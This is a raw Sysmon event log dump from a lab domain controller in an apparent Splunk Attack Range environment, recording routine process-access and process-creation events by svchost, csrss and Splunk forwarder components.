15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7E13-5FA1-8701-000000008801}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E13-5FA1-8701-000000008801}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.884{D28789B6-7E13-5FA1-8701-000000008801}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E13-5FA1-8601-000000008801}1304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7E13-5FA1-8601-000000008801}1304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E13-5FA1-8601-000000008801}1304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.196{D28789B6-7E13-5FA1-8601-000000008801}1304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E14-5FA1-8801-000000008801}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:12.524{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 